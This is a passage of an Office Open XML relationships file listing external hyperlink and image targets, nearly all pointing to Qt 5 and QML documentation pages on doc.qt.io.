Id="rId1693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1998" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtexturematerial.html" TargetMode="External"/><Relationship Id="rId2744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2951" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-altimeter.html" TargetMode="External"/><Relationship Id="rId923" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-fillerkey.html" TargetMode="External"/><Relationship Id="rId1553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId1858" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-imports.html" TargetMode="External"/><Relationship Id="rId1206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-qsignaltransition.html" TargetMode="External"/><Relationship Id="rId1413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-tumblercolumn.html" TargetMode="External"/><Relationship Id="rId1620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId2909" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId1718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1925" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId2187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-numberanimation.html" TargetMode="External"/><Relationship Id="rId2394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-documents-definetypes.html" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmake-manual.html" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-calendar-calendar.html" TargetMode="External"/><Relationship Id="rId2047" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId2461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-vector3danimation.html" TargetMode="External"/><Relationship Id="rId2699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId3000" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/gettingstartedqml.html" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-glossary.html" TargetMode="External"/><Relationship Id="rId878" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-delegatemodel.html" TargetMode="External"/><Relationship Id="rId1063" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-map.html" TargetMode="External"/><Relationship Id="rId1270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-styles-selectionlistitem.html" TargetMode="External"/><Relationship Id="rId2114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations-software.html" TargetMode="External"/><Relationship Id="rId2559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2766" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2973" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickextras-index.html" TargetMode="External"/><Relationship Id="rId640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qvariant.html" TargetMode="External"/><Relationship Id="rId738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-attribute.html" TargetMode="External"/><Relationship Id="rId945" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-frustumculling.html" TargetMode="External"/><Relationship Id="rId1368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-textfield.html" TargetMode="External"/><Relationship Id="rId1575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-topic.html" TargetMode="External"/><Relationship Id="rId1782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickdialogs-index.html" TargetMode="External"/><Relationship Id="rId2321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-state.html" TargetMode="External"/><Relationship Id="rId2626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgopacitynode.html" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-dynamicscene-example.html" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-topic.html" TargetMode="External"/><Relationship Id="rId805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dshader.html" TargetMode="External"/><Relationship Id="rId1130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-orientationreading.html" TargetMode="External"/><Relationship Id="rId1228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-recursiveblur.html" TargetMode="External"/><Relationship Id="rId1435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-settings-virtualkeyboardsettings.html" TargetMode="External"/><Relationship Id="rId1642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1947" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qttest-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2900" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId1502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId1807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/resources.html" TargetMode="External"/><Relationship Id="rId2069" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtransformnode.html" TargetMode="External"/><Relationship Id="rId3022" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qtcreator/images/qml-link-debugging-library.png" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-huesaturation.html" TargetMode="External"/><Relationship Id="rId2276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keynavigation.html" TargetMode="External"/><Relationship Id="rId2483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId2690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-image.html" TargetMode="External"/><Relationship Id="rId662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId1085" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-menubar.html" TargetMode="External"/><Relationship Id="rId1292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-smoothedanimation.html" TargetMode="External"/><Relationship Id="rId2136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/modelview-overview.png" TargetMode="External"/><Relationship Id="rId2788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2995" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtlocation-index.html" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-basictypes.html" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId967" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gridview.html" TargetMode="External"/><Relationship Id="rId1152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathline.html" TargetMode="External"/><Relationship Id="rId1597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlapplications.html" TargetMode="External"/><Relationship Id="rId2203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-opacityanimator.html" TargetMode="External"/><Relationship Id="rId2648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsqlquerymodel.html" TargetMode="External"/><Relationship Id="rId2855" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-clipplane.html" TargetMode="External"/><Relationship Id="rId1012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-itemmodelsurfacedataproxy.html" TargetMode="External"/><Relationship Id="rId1457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginenewviewrequest.html" TargetMode="External"/><Relationship Id="rId1664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId1871" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-itemparticle.html" TargetMode="External"/><Relationship Id="rId2508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchoranimation.html" TargetMode="External"/><Relationship Id="rId2715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2922" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-state.html" TargetMode="External"/><Relationship Id="rId1524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-timer.html" TargetMode="External"/><Relationship Id="rId1731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1969" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qpainter.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId1829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId2298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-righttoleft.html" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/linguist-manager.html" TargetMode="External"/><Relationship Id="rId2060" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry.html" TargetMode="External"/><Relationship Id="rId2158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerialshader.html" TargetMode="External"/><Relationship Id="rId2365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/plugins-howto.html" TargetMode="External"/><Relationship Id="rId891" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-direction.html" TargetMode="External"/><Relationship Id="rId989" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-icon.html" TargetMode="External"/><Relationship Id="rId2018" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2877" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-systempalette.html" TargetMode="External"/><Relationship Id="rId751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-bardataproxy.html" TargetMode="External"/><Relationship Id="rId849" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-conegeometry.html" TargetMode="External"/><Relationship Id="rId1174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-placesearchmodel.html" TargetMode="External"/><Relationship Id="rId1381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-tiltsensor.html" TargetMode="External"/><Relationship Id="rId1479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-zoomblur.html" TargetMode="External"/><Relationship Id="rId1686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId2225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-statechangescript.html" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-rectangularglow.html" TargetMode="External"/><Relationship Id="rId1034" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keys.html" TargetMode="External"/><Relationship Id="rId1241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rotation.html" TargetMode="External"/><Relationship Id="rId1339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-swipedelegate.html" TargetMode="External"/><Relationship Id="rId1893" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph.html" TargetMode="External"/><Relationship Id="rId2737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2944" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-action.html" TargetMode="External"/><Relationship Id="rId916" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-enumeration.html" TargetMode="External"/><Relationship Id="rId1101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId1546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1960" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId2804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-core-transform.html" TargetMode="External"/><Relationship Id="rId1613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-messagedialog.html" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1918" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2082" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlpropertyvaluesource.html" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-uses-animation.png" TargetMode="External"/><Relationship Id="rId2387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/repeater-index.png" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-definetypes.html" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-busyindicatorstyle.html" TargetMode="External"/><Relationship Id="rId1196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-progressbar.html" TargetMode="External"/><Relationship Id="rId2247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png" TargetMode="External"/><Relationship Id="rId2454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchoranimation.html" TargetMode="External"/><Relationship Id="rId2899" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-enumeration.html" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-topic.html" TargetMode="External"/><Relationship Id="rId633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId980" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 